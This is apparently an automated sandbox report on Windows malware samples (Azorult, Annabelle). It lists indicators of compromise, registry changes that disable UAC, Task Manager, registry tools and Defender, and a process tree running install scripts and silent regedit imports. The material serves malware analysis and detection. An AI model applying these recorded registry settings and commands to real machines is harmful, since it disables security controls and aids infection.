4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe
4408	taskmgr.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
964	rutserv.exe
2656	rutserv.exe
5348	rutserv.exe
5100	rutserv.exe
2644	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3776 wrote to memory of 3132	3776	NameItwhatever.exe	88
PID 3776 wrote to memory of 3132	3776	NameItwhatever.exe	88
PID 3132 wrote to memory of 4984	3132	NameItwhatever.exe	92
PID 3132 wrote to memory of 4984	3132	NameItwhatever.exe	92
PID 4984 wrote to memory of 4392	4984	cmd.exe	94
PID 4984 wrote to memory of 4392	4984	cmd.exe	94
PID 1920 wrote to memory of 2976	1920	msedge.exe	113
PID 1920 wrote to memory of 2976	1920	msedge.exe	113
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4164	1920	msedge.exe	114
PID 1920 wrote to memory of 4724	1920	msedge.exe	115
PID 1920 wrote to memory of 4724	1920	msedge.exe	115
PID 1920 wrote to memory of 4348	1920	msedge.exe	116
PID 1920 wrote to memory of 4348	1920	msedge.exe	116
PID 1920 wrote to memory of 4348	1920	msedge.exe	116
PID 1920 wrote to memory of 4348	1920	msedge.exe	116
PID 1920 wrote to memory of 4348	1920	msedge.exe	116
PID 1920 wrote to memory of 4348	1920	msedge.exe	116
PID 1920 wrote to memory of 4348	1920	msedge.exe	116
PID 1920 wrote to memory of 4348	1920	msedge.exe	116
PID 1920 wrote to memory of 4348	1920	msedge.exe	116
PID 1920 wrote to memory of 4348	1920	msedge.exe	116
PID 1920 wrote to memory of 4348	1920	msedge.exe	116
PID 1920 wrote to memory of 4348	1920	msedge.exe	116
PID 1920 wrote to memory of 4348	1920	msedge.exe	116
PID 1920 wrote to memory of 4348	1920	msedge.exe	116

System policy modification 1 TTPs 48 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\WindowsDefenderMAJ = "1"	Annabelle.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\WindowsDefenderMAJ = "1"	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Annabelle.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Annabelle.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Annabelle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	Annabelle.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	Annabelle.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Annabelle.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\WindowsDefenderMAJ = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\WindowsDefenderMAJ = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1"	Annabelle.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System	Annabelle.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System	Annabelle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\WindowsDefenderMAJ = "1"	Annabelle.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3616	attrib.exe
3320	attrib.exe
1816	attrib.exe
1796	attrib.exe
5560	attrib.exe
5924	attrib.exe

C:\Users\Admin\AppData\Local\Temp\NameItwhatever.exe
"C:\Users\Admin\AppData\Local\Temp\NameItwhatever.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3776
- C:\Users\Admin\AppData\Local\Temp\NameItwhatever.exe
  "C:\Users\Admin\AppData\Local\Temp\NameItwhatever.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4984
  - - C:\Windows\System32\wbem\WMIC.exe
      C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4392

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4408

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:1920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd091946f8,0x7ffd09194708,0x7ffd09194718
  2⤵
  PID:2976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  2⤵
  PID:4164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
  2⤵
  PID:4724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
  2⤵
  PID:4348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
  2⤵
  PID:4604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
  2⤵
  PID:4764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
  2⤵
  PID:2964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1
  2⤵
  PID:3620
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:8
  2⤵
  PID:780
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:8
  2⤵
  PID:2892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
  2⤵
  PID:4280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
  2⤵
  PID:5100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --service-sandbox-type=audio --mojo-platform-channel-handle=3764 /prefetch:8
  2⤵
  PID:1720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --service-sandbox-type=video_capture --mojo-platform-channel-handle=5692 /prefetch:8
  2⤵
  - Modifies registry class
  PID:772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
  2⤵
  PID:4428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
  2⤵
  PID:5712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
  2⤵
  PID:5720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
  2⤵
  PID:5880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:5888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
  2⤵
  PID:4372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2004 /prefetch:1
  2⤵
  PID:6092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --service-sandbox-type=collections --mojo-platform-channel-handle=6512 /prefetch:8
  2⤵
  PID:3612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1
  2⤵
  PID:3940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
  2⤵
  PID:5688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
  2⤵
  PID:5516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5264 /prefetch:8
  2⤵
  PID:4580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=7072 /prefetch:8
  2⤵
  PID:3908
- C:\Users\Admin\Downloads\Azorult.exe
  "C:\Users\Admin\Downloads\Azorult.exe"
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - UAC bypass
  - Blocks application from running via registry modification
  - Drops file in Drivers directory
  - Checks computer location settings
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Modifies WinLogon
  - Drops file in Program Files directory
  - System policy modification
  PID:4684
- - C:\ProgramData\Microsoft\Intel\wini.exe
    C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    PID:1924
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
      4⤵
      Checks computer location settings
      PID:1592
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
        5⤵
        
        PID:5920
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        6⤵
        UAC bypass
        Windows security bypass
        Runs .reg file with regedit
        
        PID:5952
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        6⤵
        Runs .reg file with regedit
        
        PID:5192
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        6⤵
        Delays execution with timeout.exe
        
        PID:1408
